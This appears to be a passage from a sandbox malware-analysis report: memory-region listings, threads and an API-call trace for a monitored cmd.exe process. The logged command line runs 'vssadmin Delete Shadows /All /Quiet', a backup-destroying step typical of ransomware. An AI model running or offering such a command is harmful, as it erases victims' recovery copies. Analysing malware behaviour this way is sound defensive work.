	              id = 3561
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 3562
	        start_va = 0x1e0000
	          end_va = 0x1e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001e0000"
	        filename = ""

Region:
	              id = 3563
	        start_va = 0x1f0000
	          end_va = 0x1f3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001f0000"
	        filename = ""

Region:
	              id = 3564
	        start_va = 0x5e10000
	          end_va = 0x5ef9fff
	       monitored = 0
	     entry_point = 0x5e4d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 3565
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 3838
	        start_va = 0x540000
	          end_va = 0x540fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000540000"
	        filename = ""

Region:
	              id = 3839
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 3840
	        start_va = 0x5a0000
	          end_va = 0x5a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000005a0000"
	        filename = ""

Region:
	              id = 3841
	        start_va = 0x600000
	          end_va = 0x60ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000600000"
	        filename = ""

Region:
	              id = 3891
	        start_va = 0x5b0000
	          end_va = 0x5effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005b0000"
	        filename = ""

Region:
	              id = 3892
	        start_va = 0x7a0000
	          end_va = 0x7dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007a0000"
	        filename = ""

Region:
	              id = 3895
	        start_va = 0x7e0000
	          end_va = 0x81ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007e0000"
	        filename = ""

Region:
	              id = 3896
	        start_va = 0x820000
	          end_va = 0x85ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000820000"
	        filename = ""

Region:
	              id = 3897
	        start_va = 0x5e10000
	          end_va = 0x5e4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005e10000"
	        filename = ""

Region:
	              id = 3898
	        start_va = 0x5e50000
	          end_va = 0x5e8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005e50000"
	        filename = ""

Region:
	              id = 3976
	        start_va = 0x5e90000
	          end_va = 0x5f6ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3993
	        start_va = 0x5f70000
	          end_va = 0x5feffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005f70000"
	        filename = ""

Region:
	              id = 4006
	        start_va = 0x5f0000
	          end_va = 0x5f8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 275
	os_tid = 0x1298


Thread:
	id = 277
	os_tid = 0x11ac


Thread:
	id = 302
	os_tid = 0x370


Thread:
	id = 303
	os_tid = 0x108c


Thread:
	id = 305
	os_tid = 0xc98


Process:
	id = "47"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2e5f8000"
	os_pid = "0x10a4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=N: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3582
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3583
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3584
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 3585
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 3586
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 3587
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 3588
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3589
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 3590
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3591
	        start_va = 0x7e590000
	          end_va = 0x7e5b2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e590000"
	        filename = ""

Region:
	              id = 3592
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3593
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3594
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3595
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3596
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3597
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 3598
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 3599
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 3605
	        start_va = 0x1c0000
	          end_va = 0x1effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3606
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3607
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3612
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3613
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3614
	        start_va = 0x4600000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 3615
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3616
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 3617
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 3618
	        start_va = 0x7e490000
	          end_va = 0x7e58ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e490000"
	        filename = ""

Region:
	              id = 3773
	        start_va = 0x1f0000
	          end_va = 0x2adfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3774
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 3780
	        start_va = 0x2b0000
	          end_va = 0x2effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002b0000"
	        filename = ""

Region:
	              id = 3781
	        start_va = 0x4600000
	          end_va = 0x46fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 3782
	        start_va = 0x47c0000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047c0000"
	        filename = ""

Region:
	              id = 3783
	        start_va = 0x4350000
	          end_va = 0x439ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3784
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3785
	        start_va = 0x4390000
	          end_va = 0x439ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004390000"
	        filename = ""

Region:
	              id = 3900
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 3941
	        start_va = 0x48c0000
	          end_va = 0x4bf6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 281
	os_tid = 0x878

	[0273.052] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0273.053] GetProcessHeap () returned 0x47c0000
	[0273.053] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x400a) returned 0x47cc400
	[0273.053] GetProcessHeap () returned 0x47c0000
	[0273.054] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cc400) returned 1
	[0273.056] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0273.056] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0273.056] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0273.056] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0273.057] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0273.057] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0273.057] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0273.057] GetProcessHeap () returned 0x47c0000
	[0273.057] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x58) returned 0x47c9000
	[0273.057] GetProcessHeap () returned 0x47c0000
	[0273.057] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x1a) returned 0x47c0578
	[0273.060] GetProcessHeap () returned 0x47c0000
	[0273.060] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x52) returned 0x47c9060
	[0273.062] GetConsoleTitleW (in: lpConsoleTitle=0x18f8d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0273.311] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0273.312] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0273.313] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0273.314] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0273.315] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0273.316] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0273.317] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0273.318] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0273.318] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0273.318] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0273.318] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0273.318] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0273.318] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0273.319] GetProcessHeap () returned 0x47c0000
	[0273.319] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x210) returned 0x47c90c0
	[0273.319] GetProcessHeap () returned 0x47c0000
	[0273.320] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x64) returned 0x47c92d8
	[0273.320] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0273.320] GetProcessHeap () returned 0x47c0000
	[0273.321] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x418) returned 0x47c05c8
	[0273.321] SetErrorMode (uMode=0x0) returned 0x0
	[0273.321] SetErrorMode (uMode=0x1) returned 0x0
	[0273.321] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47c05d0, lpFilePart=0x18f3e4 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f3e4*="Desktop") returned 0x1d
	[0273.321] SetErrorMode (uMode=0x0) returned 0x1
	[0273.322] GetProcessHeap () returned 0x47c0000
	[0273.322] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c05c8, Size=0x56) returned 0x47c05c8
	[0273.322] GetProcessHeap () returned 0x47c0000
	[0273.322] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c05c8) returned 0x56
	[0273.322] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0273.322] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0273.323] GetProcessHeap () returned 0x47c0000
	[0273.323] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x182) returned 0x47c9348
	[0273.323] GetProcessHeap () returned 0x47c0000
	[0273.323] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x2fc) returned 0x47c0628
	[0273.352] GetProcessHeap () returned 0x47c0000
	[0273.352] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c0628, Size=0x184) returned 0x47c0628
	[0273.352] GetProcessHeap () returned 0x47c0000
	[0273.352] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c0628) returned 0x184
	[0273.352] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0273.352] GetProcessHeap () returned 0x47c0000
	[0273.352] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xe0) returned 0x47c94d8
	[0273.641] GetProcessHeap () returned 0x47c0000
	[0273.641] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c94d8, Size=0x76) returned 0x47c94d8
	[0273.641] GetProcessHeap () returned 0x47c0000
	[0273.641] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c94d8) returned 0x76
	[0273.642] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0273.643] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f170) returned 0xffffffff
	[0273.644] GetLastError () returned 0x2
	[0273.644] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0273.644] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f170) returned 0xffffffff
	[0273.646] GetLastError () returned 0x2
	[0273.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0273.647] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f170) returned 0x47c9558
	[0273.647] GetProcessHeap () returned 0x47c0000
	[0273.647] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x0, Size=0x14) returned 0x47c7998
	[0273.647] FindClose (in: hFindFile=0x47c9558 | out: hFindFile=0x47c9558) returned 1
	[0273.647] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f170) returned 0xffffffff
	[0273.648] GetLastError () returned 0x2
	[0273.648] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f170) returned 0x47c9558
	[0273.648] GetProcessHeap () returned 0x47c0000
	[0273.648] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c7998, Size=0x4) returned 0x47c9598
	[0273.648] FindClose (in: hFindFile=0x47c9558 | out: hFindFile=0x47c9558) returned 1
	[0273.648] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0273.648] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0273.649] GetConsoleTitleW (in: lpConsoleTitle=0x18f664, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0274.264] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f590, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f574 | out: lpAttributeList=0x18f590, lpSize=0x18f574) returned 1
	[0274.264] UpdateProcThreadAttribute (in: lpAttributeList=0x18f590, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f57c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f590, lpPreviousValue=0x0) returned 1
	[0274.265] GetStartupInfoW (in: lpStartupInfo=0x18f5c8 | out: lpStartupInfo=0x18f5c8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0274.265] GetProcessHeap () returned 0x47c0000
	[0274.265] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x18) returned 0x47c79b8
	[0274.266] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0274.266] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
